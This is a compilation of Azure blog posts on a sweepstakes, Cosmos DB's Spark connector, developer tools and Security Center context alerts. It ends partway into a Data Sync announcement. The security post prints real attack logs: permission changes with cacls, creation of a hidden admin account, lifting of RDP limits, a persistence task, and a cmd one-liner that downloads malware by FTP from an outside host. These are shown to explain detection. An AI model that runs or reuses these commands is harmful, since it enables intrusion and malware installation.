#FuelMyAwesome Asks: What Gets You In the Code Zone?

#FuelMyAwesome is a salute to coding and creating. It’s a celebration of the awesome work you do, and the awesome ways you do it. A chance for us to recognize those of you who put all you’ve got into your apps, software, and games.

We want to know: What fuels your awesome? What favorite snack or music or ritual gets you cranking out that beautiful code? It’s easy to let us know, and there are prizes involved. Just jump on Twitter and tweet to @Azure, letting us know what gets you in the code zone with the hashtags #FuelMyAwesome and #sweepstakes. In return, we’ll be rewarding some of the most fun and intriguing responses with care packs full of Microsoft #FuelMyAwesome goodies.

More on how to enter and eligibility:

You must be a current follower of the @Azure handle on Twitter.
You must use the hashtags #FuelMyAwesome and #sweepstakes when tweeting to the @Azure Twitter handle about what fuels your awesome.
Twenty (20) winners will be selected each week during a six (6) week period. Entries are eligible only for the weekly period in which they are submitted and cannot roll over to the following week, but you can enter again each week when a new drawing period begins.
You may tweet with the hashtag #FuelMyAwesome as frequently as you wish, but multiple tweets within a week will not increase your chances of winning.
You must have an active Twitter account (create one for free at www.twitter.com).
You must be 18 years of age or older.
If you are 18 years of age or older but are considered a minor in your place of residence, you should ask your parent’s or legal guardian’s permission prior to entering the sweepstakes.
You must be a legal resident of the United States, residing in a location where sweepstakes are not prohibited.
You must not be an employee of Microsoft Corporation or an employee of a Microsoft subsidiary.
You have from June 7 to July 21 to enter—so get out there and tell us what gets your awesome going.

Check out the full Terms and Conditions, including winner selection and prize details, here. We can’t wait to see what fuels your awesome.
Source: Azure

Forrester report: What tech leaders are saying about cloud adoption

If your CEO asked about your progress moving to the cloud compared to other companies, would you know the answer? The "Benchmark Your Enterprise Cloud Adoption" report, published by Forrester Research, presents a wide-ranging look at strategies, priorities, and insights from infrastructure and technology leaders to help you assess and improve your cloud adoption initiatives.

Based on surveys of several thousand businesses, the report serves as a check-in for such topics as trends driving enterprise cloud demand, shifting attitudes toward cloud security, the prevalence of cost and usage monitoring, and the most popular platform options for starting a cloud adoption initiative. Along with the data, Forrester analysts also provide guidance such as these four strategies for growing cloud use at your company:

Connect with influencers
Make sure your cloud initiatives focus on the topics that are important to the people who are invested in their success, such as developers and business leaders.
Shift your metrics mindset
New performance metrics are required that align with business outcomes like speed, agility, flexibility, and autonomy, and tech leaders need to align themselves with that shift.
Know before you go
Before starting your cloud development or migration initiatives, evaluate your portfolio to identify the services that are the best candidates in terms of effort and impact.
New metrics mean new rewards
Rethink success in terms of speed and consistency, time to market, and meeting customer needs. That means not only encouraging technology management teams to standardize and automate, but rewarding them when they succeed.

Featuring peer-based benchmark survey data, this report will help you assess your company's move to the cloud, understand the approaches and priorities other tech leaders are using, and decide what should be at the top of your cloud priority list for 2017. Download your complimentary copy of "Benchmark Your Enterprise Cloud Adoption."

Source: Azure

Spark Connector for #CosmosDB – seamless interaction with globally-distributed, multi-model data

Today, we’re excited to announce that the Spark connector for Azure Cosmos DB is now truly multi-model! As noted in our recent announcement Azure Cosmos DB: The industry’s first globally-distributed, multi-model database service, our goal is to help you write globally distributed apps more easily, using the tools and APIs you are already familiar with. Azure Cosmos DB’s database engine natively supports the SQL (DocumentDB) API, MongoDB API, Gremlin (graph) API, and Azure Table storage API. With the updated Spark connector for Azure Cosmos DB, Apache Spark can now interact with all Azure Cosmos DB data models: Documents, Tables, and Graphs.

What is Azure Cosmos DB?

Azure Cosmos DB is Microsoft's globally distributed, multi-model database service for mission-critical applications. Azure Cosmos DB provides turn-key global distribution, elastic scale out of throughput and storage worldwide, single-digit millisecond latencies at the 99th percentile, five well-defined consistency levels, and guaranteed high availability, all backed by industry-leading, comprehensive SLAs. Azure Cosmos DB automatically indexes all data without requiring you to deal with schema and index management. It is multi-model and supports document, key-value, graph, and columnar data models. As a cloud-born service, Azure Cosmos DB is carefully engineered with multi-tenancy and global distribution from the ground up.

Perform Real-time Machine Learning on Globally-Distributed Data with Apache Spark and Azure Cosmos DB

The Spark connector for Azure Cosmos DB enables real-time data science, machine learning, advanced analytics, and exploration over globally distributed data in Azure Cosmos DB. Connecting Apache Spark to Azure Cosmos DB accelerates our customers’ ability to solve fast-moving data science problems, where data can be quickly persisted and queried using Azure Cosmos DB. The connector efficiently exploits the native Azure Cosmos DB managed indexes and enables updateable columns when performing analytics. It also utilizes push-down predicate filtering against fast-changing globally-distributed data, addressing a diverse set of IoT, data science, and analytics scenarios.

Other use-cases of Azure Cosmos DB + Spark include:

Streaming Extract, Transformation, and Loading of data (ETL)
Data enrichment
Trigger event detection
Complex session analysis and personalization
Visual data exploration and interactive analysis
Notebook experience for data exploration, information sharing, and collaboration

The Spark Connector for Azure Cosmos DB uses the Azure DocumentDB Java SDK. You can get started today and download the Spark connector from GitHub!

Working with Azure Cosmos DB Tables

Azure Cosmos DB provides the Table API for applications that need a key-value store with flexible schema, with predictable performance and global distribution. Azure Table storage SDKs and REST APIs can be used to work with Azure Cosmos DB. Azure Cosmos DB supports throughput-optimized tables (informally called "premium tables"), currently in public preview.

To connect Apache Spark to the Azure Cosmos DB Table API, you can use the Spark Connector for Azure Cosmos DB as follows.

// Initialization
import com.microsoft.azure.cosmosdb.spark.schema._
import com.microsoft.azure.cosmosdb.spark._
import com.microsoft.azure.cosmosdb.spark.config.Config

val readConfig = Config(Map(
  "Endpoint" -> "https://$tableContainer$.documents.azure.com:443/",
  "Masterkey" -> "$masterkey$",
  "Database" -> "$tableDatabase$",
  "Collection" -> "$tableCollection$",
  "SamplingRatio" -> "1.0"))

// Create collection connection
val tblCntr = spark.sqlContext.read.cosmosDB(readConfig)
tblCntr.createOrReplaceTempView("tableContainer")

Once you have connected to the Table, you can create a Spark DataFrame (in the preceding example, this would be tblCntr).

// Print tblCntr DataFrame Schema
scala> tblCntr.printSchema()
root
 |-- _etag: string (nullable = true)
 |-- $id: string (nullable = true)
 |-- _rid: string (nullable = true)
 |-- _attachments: string (nullable = true)
 |-- City: struct (nullable = true)
 |    |-- $t: integer (nullable = true)
 |    |-- $v: string (nullable = true)
 |-- State: struct (nullable = true)
 |    |-- $t: integer (nullable = true)
 |    |-- $v: string (nullable = true)
 |-- $pk: string (nullable = true)
 |-- id: string (nullable = true)
 |-- _self: string (nullable = true)
 |-- _ts: integer (nullable = true)

// Run Spark SQL query against your Azure Cosmos DB table
scala> spark.sql("select `$id`, `$pk`, City.`$v` as City, State.`$v` as State from tableContainer where City.`$v` = 'Seattle'").show()
+----+-----+-------+-----+
| $id|  $pk|   City|State|
+----+-----+-------+-----+
|John|Smith|Seattle|   WA|
+----+-----+-------+-----+

You can quickly and easily interact with your schema and execute Spark SQL queries against your underlying Azure Cosmos DB table.

Working with Azure Cosmos DB Graphs

Azure Cosmos DB provides graph modeling and traversal APIs along with turn-key global distribution, elastic scale-out of storage and throughput, read latencies under 10 ms and write latencies under 15 ms at the 99th percentile, automatic indexing and query, tunable consistency levels, and comprehensive SLAs including 99.99% availability. Azure Cosmos DB can be queried using Apache TinkerPop's graph traversal language, Gremlin, with seamless integration with other TinkerPop-compatible graph systems such as Apache Spark GraphX.

To connect Apache Spark to the Azure Cosmos DB Graph, you will use the Spark Connector for Azure Cosmos DB as follows.

// Initialization
import com.microsoft.azure.cosmosdb.spark.schema._
import com.microsoft.azure.cosmosdb.spark._
import com.microsoft.azure.cosmosdb.spark.config.Config

// Maps
// Note: the "Masterkey" line was missing a trailing comma
val baseConfigMap = Map(
  "Endpoint" -> "https://$graphContainer$.documents.azure.com:443/",
  "Masterkey" -> "$masterKey$",
  "Database" -> "$database$",
  "Collection" -> "$collection$",
  "SamplingRatio" -> "1.0",
  "schema_samplesize" -> "1000"
)

val airportConfigMap = baseConfigMap ++ Map("query_custom" -> "select * from c where c.label='airport'")
val delayConfigMap = baseConfigMap ++ Map("query_custom" -> "select * from c where c.label='flight'")

// Configs
// get airport data (vertices)
val airportConfig = Config(airportConfigMap)
val airportColl = spark.sqlContext.read.cosmosDB(airportConfig)
airportColl.createOrReplaceTempView("airportColl")

// get flight delay data (edges)
val delayConfig = Config(delayConfigMap)
val delayColl = spark.sqlContext.read.cosmosDB(delayConfig)
delayColl.createOrReplaceTempView("delayColl")

Here, we have created two Spark DataFrames – one for the airport data (the vertices) and one for the flight delay data (the edges). The graph we have stored in Azure Cosmos DB can be visually depicted as in the figure below, where the vertices are the blue circles representing the airports and the edges are the black lines representing the flights between those cities. In this example, the originating city for those flights (edges) is Seattle (the blue circle at the top left of the map, from which all the edges originate).

Figure: D3.js visualization of airports (blue circles) and edges (black lines), which are the flights between the cities.

Benefit of Integrating Cosmos DB Graphs with Spark

One of the key benefits of working with Azure Cosmos DB graphs and the Spark connector is that Gremlin queries and Spark DataFrame queries (as well as other Spark queries) can be executed against the same data container, be it a graph, a table, or a collection of documents. For example, below are some simple Gremlin Groovy queries against the flights graph stored in our Azure Cosmos DB graph.

         ,,,/
         (o o)
-----oOOo-(3)-oOOo-----
plugin activated: tinkerpop.server
plugin activated: tinkerpop.utilities
plugin activated: tinkerpop.tinkergraph
gremlin> :remote connect tinkerpop.server conf/remote-secure.yaml
==>Configured tychostation.graphs.azure.com/52.173.137.146:443

gremlin> // How many flights into each city leaving SEA
==>true
gremlin> :> g.V().has('iata', 'SEA').outE('flight').inV().values('city').groupCount()
==>[Chicago:1088,New York:432,Dallas:800,Miami:90,Washington DC:383,Newark:345,Boston:315,Orlando:116,Philadelphia:193,Fort Lauderdale:90,Minneapolis:601,Juneau:180,Ketchikan:270,Anchorage:1097,Fairbanks:260,San Jose:611,San Francisco:1698,San Diego:617,Oakland:798,Sacramento:629,Los Angeles:1804,Orange County:569,Burbank:266,Ontario:201,Palm Springs:236,Las Vegas:1204,Phoenix:1228,Tucson:90,Austin:90,Denver:1231,Spokane:269,San Antonio:90,Salt Lake City:860,Houston:568,Atlanta:521,St. Louis:90,Kansas City:95,Honolulu, Oahu:415,Kahului, Maui:270,Lihue, Kauai:128,Long Beach:345,Detroit:244,Cincinnati:4,Omaha:90,Santa Barbara:90,Fresno:142,Colorado Springs:90,Portland:602,Jackson Hole:13,Cleveland:6,Charlotte:169,Albuquerque:105,Reno:90,Milwaukee:82]

gremlin> // SEA -> Reno flight delays
==>true
gremlin> :> g.V().has('iata', 'SEA').outE('flight').as('e').inV().has('iata', 'RNO').select('e').values('delay').sum()
==>963

The preceding code connects to the tychostation graph (tychostation.graphs.azure.com) to run the following Gremlin Groovy queries:

Using graph traversal and groupCount(), determines the number of flights originating from Seattle to each of the listed destination cities (e.g., there are 1088 flights from Seattle to Chicago in this dataset).
Using graph traversal, determines the total delay (in minutes) across the 90 flights from Seattle to Reno (963 minutes of delay).
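Conceptually, groupCount() and the delay sum() are just grouped aggregations. As a rough pure-Scala analogy (the Flight case class and sample rows below are made up for illustration, not taken from the dataset above):

```scala
// Hypothetical stand-ins for the flight edges stored in Cosmos DB
case class Flight(src: String, dst: String, delay: Int)

val flights = Seq(
  Flight("SEA", "ORD", 10), Flight("SEA", "ORD", 5),
  Flight("SEA", "RNO", 30), Flight("SEA", "JFK", 0)
)

// groupCount() analogue: flights out of SEA, counted per destination
val groupCount: Map[String, Int] =
  flights.filter(_.src == "SEA")
    .groupBy(_.dst)
    .map { case (dst, fs) => dst -> fs.size }

// sum() analogue: total delay on the SEA -> RNO edges
val seaRnoDelay: Int =
  flights.filter(f => f.src == "SEA" && f.dst == "RNO").map(_.delay).sum
```

The Gremlin traversal does the same filtering, grouping, and summing, but server-side over the globally distributed graph.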

With the Spark connector using the same tychostation graph, we can also run our own Spark DataFrame queries. Following up from the preceding Spark connector code snippet, let’s run our Spark SQL queries – in this case we’re using the HDInsight Jupyter notebook service.

Top 5 destination cities departing from Seattle

%%sql
select a.city, sum(f.delay) as TotalDelay
from delays f
join airports a
on a.iata = f.dst
where f.src = 'SEA' and f.delay < 0
group by a.city
order by sum(f.delay) limit 5

Calculate median delays by destination cities departing from Seattle

%%sql
select a.city, percentile_approx(f.delay, 0.5) as median_delay
from delays f
join airports a
on a.iata = f.dst
where f.src = 'SEA' and f.delay < 0
group by a.city
order by median_delay
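percentile_approx(f.delay, 0.5) returns an approximate median. For intuition about the quantity being approximated, here is an exact median over a small in-memory sample (the delay values are made up for illustration):

```scala
// Made-up sample of (negative) delay values for one destination city
val delays = Seq(-12, -7, -3, -1, -20)

val sorted = delays.sorted  // ascending: -20, -12, -7, -3, -1

// Exact median: middle element for odd sizes, mean of the two middle
// elements for even sizes
val median: Double =
  if (sorted.size % 2 == 1) sorted(sorted.size / 2).toDouble
  else (sorted(sorted.size / 2 - 1) + sorted(sorted.size / 2)) / 2.0
```

At scale, computing this exactly requires a full sort per group, which is why Spark SQL offers the cheaper percentile_approx instead.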

With Azure Cosmos DB, you can run both Apache TinkerPop Gremlin queries AND Apache Spark DataFrame queries against the same graph.

Working with Azure Cosmos DB Document data model

Whether you are using Azure Cosmos DB graphs, tables, or documents, from the perspective of the Spark Connector for Azure Cosmos DB, the code is the same! Ultimately, the template to connect to any of these data models is noted below:

Configure your connection.
Build your config and DataFrame.
And voila – Apache Spark is working in tandem with Azure Cosmos DB.

// Initialization
import com.microsoft.azure.cosmosdb.spark.schema._
import com.microsoft.azure.cosmosdb.spark._
import com.microsoft.azure.cosmosdb.spark.config.Config

// Configure your connection
// Note: the "Masterkey" line was missing a trailing comma
val baseConfigMap = Map(
  "Endpoint" -> "https://$documentContainer$.documents.azure.com:443/",
  "Masterkey" -> "$masterKey$",
  "Database" -> "$database$",
  "Collection" -> "$collection$",
  "SamplingRatio" -> "1.0",
  "schema_samplesize" -> "1000"
)

// Build config and DataFrame
val baseConfig = Config(baseConfigMap)
val baseColl = spark.sqlContext.read.cosmosDB(baseConfig)

With the Spark Connector for Azure Cosmos DB, data is parallelized between the Spark worker nodes and the Azure Cosmos DB data partitions. Therefore, whether your data is stored in tables, graphs, or documents, you get the performance, scalability, throughput, and consistency backed by Azure Cosmos DB when you are solving your machine learning and data science problems with Apache Spark.

Next Steps

In this blog post, we’ve looked at how Spark Connector for Azure Cosmos DB can seamlessly interact with multiple data models supported by Azure Cosmos DB. Apache Spark with Azure Cosmos DB enables both ad-hoc, interactive queries on big data, as well as advanced analytics, data science, machine learning and artificial intelligence. Azure Cosmos DB can be used for capturing data that is collected incrementally from various sources across the globe. This includes social analytics, time series, game or application telemetry, retail catalogs, up-to-date trends and counters, and audit log systems. Spark can then be used for running advanced analytics and AI algorithms at scale and globally on top of the data living in Azure Cosmos DB.  With Azure Cosmos DB being the industry’s first globally distributed multi-model database service, the Spark connector for Azure Cosmos DB can work with tables, graphs, and document data models – with more to come!

To get started running queries, create a new Azure Cosmos DB account from the Azure portal and work with the project in our Azure-CosmosDB-Spark GitHub repo.

Stay up-to-date on the latest Azure Cosmos DB news and features by following us on Twitter @AzureCosmosDB and #CosmosDB and reach out to us on the developer forums on Stack Overflow.
Source: Azure

Azure Post Exploitation Techniques

The Cloud and Enterprise Red Team introduced how traditional network attack techniques apply to the cloud, along with trends seen in Azure for addressing them. The presentation was given at the Infiltrate 2017 conference and is now available online.

Presentation

Cloud Post Exploitation Technique

Presenters – @sachafaust and @andrewjohnson, Red Team, Cloud & Enterprise

Source: Azure

New language support for Azure Media Indexer v2

Speech to text has been one of the most exciting Azure Media Services components since the original release of Azure Media Indexer in 2014.

Today we are ready to release the following new languages to the "Azure Media Indexer 2 Preview" Media Processor: Russian, British English, and Mexican Spanish.

Currently we support the following languages:

(new) Russian [RuRu] 
(new) British English [EnGb] 
(new) Mexican Spanish [EsMx] 
English [EnUs]
Spanish [EsEs]
Chinese (Mandarin, Simplified) [ZhCn]
French [FrFr]
German [DeDe]
Italian [ItIt]
Portuguese [PtBr]
Arabic (Egyptian) [ArEg]
Japanese [JaJp]

In order to run a task against media containing speech in the Russian language, use the following task preset:

{
  'Version': '1.0',
  'Features': [{
    'Options': {
      "Language": "RuRu"
    }
  }]
}

Feel free to swap out the language parameter for any of the supported languages in the list above.
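For example, the same preset targeting British English changes only the Language value (using the [EnGb] code from the list above):

```json
{
  'Version': '1.0',
  'Features': [{
    'Options': {
      "Language": "EnGb"
    }
  }]
}
```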

Still not sure what Azure Media Indexer 2 is? Read the introductory blog post to learn how to extract the speech content from your media files.

Want to get started? Check out the official documentation.

To learn more about Azure Media Analytics, check out the introductory blog post.

Have feedback? Share it on our feedback forum.

 
Source: Azure

Diagnose sudden changes in your app behavior with a click!

Spikes or steps in the telemetry of your app can now be easily diagnosed.

When you use Application Insights Analytics to explore app metrics over time, sudden changes, such as spikes or dips, are highlighted. With one click, Smart Diagnostics will find a pattern (a series of data with common values) that correlates with the change, and explain the reason behind it.

After you’ve created a time chart that includes an unusual change, click a highlighted data point. Smart Diagnostics finds a filter pattern that explains the data discontinuity – it identifies the pattern in which the discrepancy occurs, isolates it, and displays the result with and without the filter:

In this example, a new release of an app caused a sudden rise in the exception rate. Smart Diagnostics found a filter that characterized the change: The additional errors occur when users view a particular URL with a particular combination of browser version and client operating system. Smart Diagnostics displays the result with the filter false and true, so that you can easily see how strongly the change depends on the filter. In this case, with other combinations of URL, browser, or OS, the background trend continues as it was before, while all the additional errors are attributable to the problem values.

This information helps you focus your investigation on the root cause of the issue.

Want to know more?

Learn more about Smart Diagnostics in Analytics.
See a demonstration of Smart Diagnostics on sample data.
Watch the Smart Diagnostics short video.

Smart Diagnostics is currently in preview, and we’re very keen to get your feedback – just click the smiley face icon on the Smart Diagnostics results tab, or at the top right of the Analytics window.
Source: Azure

HDInsight tools for IntelliJ May updates

The primary focus of our May updates is to make Spark development easier for you in IntelliJ! In this release, your Spark remote debugging experience is significantly improved. Scala SDK installation, Scala project creation, and Spark job submission are also simplified. You can now use IntelliJ “run as” or “debug as” for Spark job submission and debugging, and you can load Spark job configuration from a local property file. The key updates are summarized below.

Simplified Scala project creation

The installation and Scala project creation processes are greatly simplified through on-demand Scala plugin installation and automatic Scala SDK download during project creation. To learn more, please watch our demo Create Spark Scala Applications.

1. The Scala project creation wizard now checks whether the Scala plugin is installed and helps you search for and install it the first time.

2. Previously you needed to specify the Spark version, find the corresponding Scala SDK version, and download the Scala SDK manually. Now you only need to specify the Spark version during project creation, and the corresponding Scala SDK and libraries are downloaded automatically. Please note that the Spark version you choose here should match your Spark cluster version.

Improved Spark remote debugging

We have developed a super cool remote debugging feature which allows you to run and debug a Spark application remotely on an HDInsight cluster anytime. To learn more, please watch our demo HDInsight Spark Remote Debugging.

The initial configuration to connect to your HDInsight Spark cluster for remote debugging takes just a few clicks, outlined below:

To configure Spark remote debugging, go to IntelliJ “Run” menu -> “Edit Configurations” -> new “Submit Spark Job” configuration. You are asked to enter information including Spark cluster, artifact, and main class name as shown below.

By clicking “Advanced configuration”, you can “Enable Spark remote debug”, and specify SSH user name, password, or private key file as shown below.

IntelliJ “run as” / “debug as” integration

You can either go to IntelliJ “Run” menu -> “Edit Configurations” –> click new “Submit Spark Job”, or right click the project and then choose “Submit Spark Job” to submit your Spark job.

You can customize the configuration, such as cluster, main class, artifact, and so on. 

You can use IntelliJ “run” or “debug” in the menu, or click the run icon or the debug icon (as shown below) in the toolbar, to start a Spark remote debugging session.

You can also set up a breakpoint, edit the application, step through the code, and resume the execution while you are performing remote debugging.

Load Job Configuration

In the Spark submission window, you can now load job configuration from a local property file by clicking the “browse” button beside “Job configuration”, as shown below.

How to install/update

You can get the latest bits by going to the IntelliJ repository and searching for “Azure Toolkit.” IntelliJ will also prompt you to update if you have already installed the plugin.

 

For more information, check out the following:

IntelliJ User Guide: Use HDInsight Tools in Azure Toolkit for IntelliJ to create Spark applications for HDInsight Spark Linux cluster
IntelliJ HDInsight Spark Local Run: Use HDInsight Tools for IntelliJ with Hortonworks Sandbox   
Create Scala Project (Video): Create Spark Scala Applications 
Remote Debug (Video): Use Azure Toolkit for IntelliJ to debug Spark applications remotely on HDInsight Cluster

Learn more about today’s announcements on the Azure blog and Big Data blog.

Discover more Azure service updates.

If you have questions, feedback, comments, or bug reports, please use the comments below or send a note to hdivstool@microsoft.com.
Source: Azure

Azure Security Center adds Context Alerts to aid threat investigation

In two recent articles, Greg Cottingham and Jessen Kurien described investigation processes triggered by a security alert. If you haven't already done so, please read “How Azure Security Center helps reveal a Cyberattack” and “How Azure Security Center detects a Bitcoin mining attack”; this post will make a lot more sense if you've read them. In these articles, the authors describe how background information from logs helped to provide a deeper understanding of the attack. Once the attack was understood, an appropriate set of remediation actions could be identified to block the intrusion and prevent similar incidents from recurring.

This kind of investigation process is often difficult for customers to replicate. It requires a lot of expertise to know what to look for. Most companies don’t have security experts like Greg and Jessen on their payrolls, and from all reports, they are very expensive to hire! The process is also time-consuming, often needing hours or even days of following hints, crafting and tweaking queries, and interpreting data in order to pinpoint the attacker’s activity.

To try to address this, we recently deployed a new type of alert. This alert automates some aspects of security investigation work and tries to deliver more relevant context to the customer about what else was happening on the system during and immediately before the attack. The context gathering is triggered whenever a security detection alert is reported. If any relevant context is found, it is reported in a follow-up “suspicious behavior” alert.

Example from Azure Security Portal

Let’s review one of these alerts to get a feel for what they contain and how they can help you get a fuller picture of the context surrounding a security alert. The context alerts have the snappy title, “Potentially suspect behavior reported as extra context for other alerts.”

The context alert shown above has been annotated with some explanation. It is showing the result of three separate context queries compiled into a time-ordered list of potentially interesting events near the time of the original alert.

Although we present the event data in summarized form, you may find it easier to see what is going on if you copy the contents of the CONTEXTEVENTACTIVITY field and paste it into a text editor. For most process execution events, each line contains the time the process was run, the process name, the process command line, the repetition times or count, and the report category, typically "UnusualProcess" or "RDPLogon". The repetition field tells you if an identical event was repeated at a different time; if there are three or fewer repetitions, the times are recorded, and if there are more than three, a simple count of repetitions is included.
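If you want to slice these summarized lines programmatically, a small sketch like the following can pull out the timestamp and the trailing category tag. The line layout here is an assumption inferred from the examples in this post, not a documented format:

```scala
// Split one summarized CONTEXTEVENTACTIVITY line into
// (timestamp, body, optional "(Category)" tag).
// Assumed layout: "<HH:mm:ssZ> <command or detail> (<Category>)"
val line = "00:47:44Z xxxxxxUser 175.143.245.210 (RDPLogon)"

// Timestamp up to the first whitespace, lazy body, optional parenthesized tag
val pattern = """^(\S+Z)\s+(.*?)(?:\s+\((\w+)\))?$""".r

val parsed: Option[(String, String, Option[String])] = line match {
  case pattern(ts, body, cat) => Some((ts, body, Option(cat)))
  case _                      => None
}
```

Lines without a trailing category (most process execution events) would parse with the third element as None.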

Only a minority of alerts result in a context report. This is because we are explicitly looking for suspicious behavior and don’t create a report if we don’t find any. The types of behavior that we look for are unusual commands being executed and unusual patterns of execution. These are usually not sufficiently suspicious to trigger an alert in themselves but, in the context of a positive alert from one of our security detections, they can provide important corroborating evidence. When viewed alongside the originating alert they can give you a much fuller picture of what was happening during the attack.

How does it work?

As noted earlier, when Azure Security Center alerts on a new detection, the context service is triggered to try to answer some of the same questions a human investigator would ask about the alert. For example, "Were any other unusual processes run in this logon session?" or "Who recently logged on to this virtual machine?" Different data sources and jobs are chosen depending on the type of alert and the data items available in it. For example, if the alert contains user account details, we might use them to look up what else was run in the same account session around the time of the alert. Any relevant data from these queries is output as a Suspicious Behavior context alert in Azure Security Center.

Case studies

Here is an example similar to the attack seen in Greg's earlier post. The context report was triggered by the alert “Detected suspicious use of Cacls to lower the security state of the system.” The resulting context report combines output from three different context jobs into a time-ordered set of events. Note that I’ve stripped out some of the detail to reduce repetition and make it easier to read.

Alert Description: "Related alert (dated 2017-04-21 09:37:47Z). 4 items in report (Unusual processes executed, RDP Logons, Supplemental processes executed, Unusual multi-processes commandline execution)",
ContextEventActivity:
00:47:44Z xxxxxxUser 175.143.245.210 (RDPLogon)
09:37:26Z "C:\windows\system32\ftp.exe" -s:C:\WINDOWS\system32\us.dat
09:37:32Z ftp -s:xpoffice.exe
09:37:32Z ftp -s:c:\RECYCLER\xpoffice.exe
09:37:33Z ftp -s:c:\xpoffice.exe
09:37:45Z "C:\Windows\System32\net.exe" stop CryptSvc
09:37:45Z "C:\Windows\System32\regsvr32.exe" urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s
09:37:45Z "C:\Windows\System32\cacls.exe" C:\Windows\system32\wscript.exe /e /t /g SYSTEM:F
[removed some items for brevity]…
09:37:46Z "C:\Windows\System32\cacls.exe" C:\Windows\system32\cscript.exe /e /t /g SYSTEM:F
09:37:46Z "C:\Windows\System32\cacls.exe" C:\Windows\system32\ias\ias.mdb /e /t /g SYSTEM:F
09:37:46Z "C:\Windows\System32\net.exe" localgroup administrators abai$ /add
09:37:46Z "C:\Windows\System32\net.exe" user www.401hk.com Www.401hk.com$
09:37:46Z "C:\Windows\System32\net.exe" user www.401hk.com /active:yes
09:37:46Z "C:\Windows\System32\reg.exe" ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
[Report truncated…maximum number of items exceeded]

While not every event list may be related to the attack, in the above event trace we can see the following activities:

An RDP logon that is, in this case, probably unrelated.
Unusual execution of scripted FTP commands.
Shutting down the Windows Crypto service.
Registration of scripting DLLs. These are not typically registered on a server, but are obviously needed by the attack.
Setting permissions on cscript and wscript executables.
Creating new user accounts.
Removing restrictions from Terminal Services (RDP) logons.

Sadly, at this point we run out of space to follow the full extent of the attack, but even from this snippet of 30 items, minus the ones deleted to save space, it is fairly clear that something unusual and unwanted is going on. A further final clue is the timing of these events. A whole series of otherwise unrelated processes executed within the same minute is a clear sign of a scripted attack.

Here is another interesting variant of a similar attack pattern, with expletives edited out, based on an “Unusual process execution detected” alert.

11:44:09Z "C:\Windows\System32\regini.exe" c:\windows\system32\25run.ini
11:44:09Z "C:\Windows\System32\regini.exe" c:\windows\system32\25runq.ini
11:44:16Z "C:\Windows\System32\SecEdit.exe" /configure /cfg "C:\WINDOWS\system32\NewAuto.inf" /db newdb.sdb /log logfile.txt /areas REGKEYS FILESTORE
11:44:16Z "C:\Windows\System32\SecEdit.exe" /configure /db secedit.sdb /cfg NewAuto.inf
11:44:16Z "C:\Windows\System32\SecEdit.exe" /configure /db secedit.sdb /cfg F***Gothin.inf
11:44:28Z "C:\Windows\System32\cacls.exe" cmd.exe /e /t /g system:f
11:44:28Z "C:\Windows\System32\cacls.exe" ftp.exe /e /t /g system:f
11:44:29Z "C:\Windows\System32\cacls.exe" net.exe /e /t /g system:f
11:44:29Z "C:\Windows\System32\cacls.exe" net1.exe /e /t /g system:f
11:44:29Z "C:\Windows\System32\cacls.exe" wscript.exe /e /t /g system:f
11:44:29Z "C:\Windows\System32\cacls.exe" cscript.exe /e /t /g system:f
11:44:49Z "C:\Windows\System32\net.exe" stop CryptSvc
11:44:50Z "C:\Windows\System32\regsvr32.exe" urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s [Repeats: 11:44:50.82]
11:45:01Z "C:\Windows\System32\ftp.exe" -s:C:\MG05.dll
11:45:02Z "C:\Windows\System32\schtasks.exe" /create /tn "45645" /tr "c:\Ttqlhcjntzllto.exe" /sc minute /mo 1 /ru "system
11:45:03Z "C:\Windows\system32\cmd.exe" /c net1 stop sharedaccess&echo open 222.184.79.11 > MG06.dll&echo mix>> MG06.dll&echo mix>> MG06.dll&echo binary >> MG06.dll&echo get Ttqlhcjntzllto.exe >> MG06.dll&echo bye >> MG06.dll&ftp -s:MG06.dll&p -s:MG06.dll&Ttqlhc….
11:45:03Z ftp -s:MG06.dll

This shows regini.exe being used to perform bulk registry edits, secedit.exe being used to change system security settings, and a scheduled task being created, most likely to secure a permanent foothold on the machine. The last two lines show cmd.exe redirection being used to create an FTP script, which is then executed to download a piece of malware, Ttqlhcjntzllto.exe. In the line third from last, this executable is installed as a scheduled task. Although this appears out of order, attack scripts are often run repeatedly to give them a better chance of completing successfully, so we are probably seeing a snapshot containing the beginning and end of two executions of the same script.
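The echo-redirection trick in the one-liner above is worth unpacking: each `echo … >> MG06.dll` appends one line of FTP commands to a plain-text file, and `ftp -s:MG06.dll` then replays that file as a script. A small Python reconstruction of the file the attacker's commands build (host and filenames taken from the trace above) makes the mechanism plain:

```python
# Each "echo ... >> MG06.dll" in the attacker's one-liner appends one
# line to a plain-text FTP script; "ftp -s:MG06.dll" then replays it.
lines = [
    "open 222.184.79.11",       # connect to the attacker's FTP server
    "mix",                      # echoed twice: username, then password
    "mix",
    "binary",                   # switch to binary transfer mode
    "get Ttqlhcjntzllto.exe",   # download the malware payload
    "bye",                      # close the FTP session
]
script = "\n".join(lines) + "\n"
print(script)
```

Nothing about the file is executable on its own; the `.dll` extension is pure camouflage for what is just a text file of FTP commands.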

What’s next

Although these reports already provide valuable context for an alert, we will continue to refine them, expanding the kinds of data included and working on ways to make the output smarter.

To learn more

See other blog posts with real-world examples of how Azure Security Center helps detect cyberattacks — How Azure Security Center helps reveal a Cyberattack and How Azure Security Center detects a Bitcoin mining attack.
Azure Security Center detection capabilities — Learn about Azure Security Center’s advanced detection capabilities.
Managing and responding to security alerts in Azure Security Center — Learn how to manage and respond to security alerts.
Azure Security Center FAQ — Find frequently asked questions about using the service.

Source: Azure

Azure SQL Data Sync Refresh

We are happy to announce our Azure SQL Data Sync Refresh! With Azure SQL Data Sync, users can easily synchronize data bi-directionally between multiple Azure SQL databases and/or on-premises SQL Server databases. This release includes several major improvements to the service, including new Azure portal support, PowerShell and REST API support, and enhancements to security and privacy.

This update will be available for selected existing Data Sync customers starting June 1st. It will be available for all customers by June 15th. Please email us with your subscription ID if you’d like early access. 

What’s new?

Data Sync on the new Azure portal

Data Sync is now available in the new Azure portal for select internal customers. This will be available for all customers in mid-June. You can now manage Data Sync in the same place you manage all your other Azure resources. Data Sync will be retired from the old portal after June 1, 2017.

PowerShell programmability and REST APIs

